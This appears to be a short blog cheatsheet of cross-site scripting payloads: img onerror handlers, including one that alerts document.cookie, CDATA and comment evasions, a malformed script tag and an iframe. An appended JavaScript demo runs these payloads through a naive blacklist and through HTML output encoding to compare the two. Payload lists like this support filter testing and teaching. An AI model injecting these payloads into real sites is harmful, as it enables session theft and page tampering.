XSS Cheatsheet

I have pinched these variations from books read and other sources on the tinternet.

<IMG SRC="v" onerror="alert(document.cookie)"> 
<img src="v:v" onerror="alert(img-src-js-xss)"></img> 
<<SCRIPT>a=/XSS-B/ alert(a.source)</SCRIPT> 
<![CDATA[<img src="v:v" onerror="alert(XSS-CDATA)"></img>]]> 
<h1><![CDATA[<img src="v:v" onerror="alert(XSS-CDATA)"></img>]]></h1> 
X<!--<img src="v:v" onerror="alert(XSS-Comments)"></img>-->ML 
X<!--><img src="v:v" onerror="alert(XSS-Comments)"></img>--&gt;ML 
Always nice to stick an iframe in for visual impact. Some people don't appreciate the simplicity, NAY! the beauty and finesse of alert(1) //sarcasm
<iframe src="http://blah" width="800" height="800" scrolling="no"></iframe>

This will be updated more as I go along.
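
For anyone using this list to test their own filtering, here is an added example (not part of the original post) that runs several of the strings above through a script-and-comment stripping blacklist and through HTML output encoding, then reports which outputs still contain raw markup. The function names are hypothetical, and the encoder only covers HTML element content and quoted attribute values.

```javascript
// Added example. Payload strings are copied from the list above;
// naiveFilter, escapeHtml, hasLiveMarkup and audit are hypothetical names.
const PAYLOADS = [
  '<IMG SRC="v" onerror="alert(document.cookie)">',
  '<<SCRIPT>a=/XSS-B/ alert(a.source)</SCRIPT>',
  '<![CDATA[<img src="v:v" onerror="alert(XSS-CDATA)"></img>]]>',
  'X<!--<img src="v:v" onerror="alert(XSS-Comments)"></img>-->ML',
  'X<!--><img src="v:v" onerror="alert(XSS-Comments)"></img>--&gt;ML',
];

// Weak blacklist: deletes <script> elements and well-formed comments only.
function naiveFilter(input) {
  return input
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '')
    .replace(/<!--[\s\S]*?-->/g, '');
}

// Output encoding for HTML element content and quoted attribute values.
// It is not sufficient for script, URL or CSS contexts.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Crude demo check: does a "<" that could open a tag, comment or
// declaration survive in the output?
function hasLiveMarkup(s) {
  return /<[a-z!\/]/i.test(s);
}

// Compare both defences over every payload.
function audit(payloads) {
  return payloads.map((p) => ({
    payload: p,
    naiveStillLive: hasLiveMarkup(naiveFilter(p)),
    encodedStillLive: hasLiveMarkup(escapeHtml(p)),
  }));
}

for (const row of audit(PAYLOADS)) {
  console.log(row.naiveStillLive ? 'blacklist: LIVE ' : 'blacklist: inert',
    row.encodedStillLive ? 'encoded: LIVE ' : 'encoded: inert', row.payload);
}
```

The blacklist result varies from string to string, while the encoded output never contains a raw tag opener.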

 

For books worth reading, check out:

http://www.amazon.co.uk/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 

http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543

A very popular cheatsheet (that I often refer to) can be found here: http://ha.ckers.org/xss.html
